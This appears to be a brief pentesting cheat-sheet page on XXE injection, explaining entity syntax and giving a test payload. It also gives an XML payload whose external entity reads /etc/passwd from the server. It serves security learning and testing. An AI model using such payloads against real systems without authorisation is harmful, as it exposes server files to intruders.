XXE Injection

Basic Test for XXE

<!--?xml version="1.0" ?-->

<!DOCTYPE replace [<!ENTITY example "XXE Injection"> ]>

<details>

<subnet_mask>&example;</subnet_mask>

<test></test>

</details>

  • The name "example is just the name of the variable

    • It could be anything you want

  • Use "SYSTEM" to read files on the server

    • enclose the directories in quotes

<!--?xml version="1.0" ?-->

<!DOCTYPE replace [<!ENTITY example SYSTEM "/etc/passwd"> ]>

<details>

<subnet_mask>&example;</subnet_mask>

<test></test>

</details>

PreviousXML External Entity (XXE)NextBypass Client Side JavaScript Validation

Last updated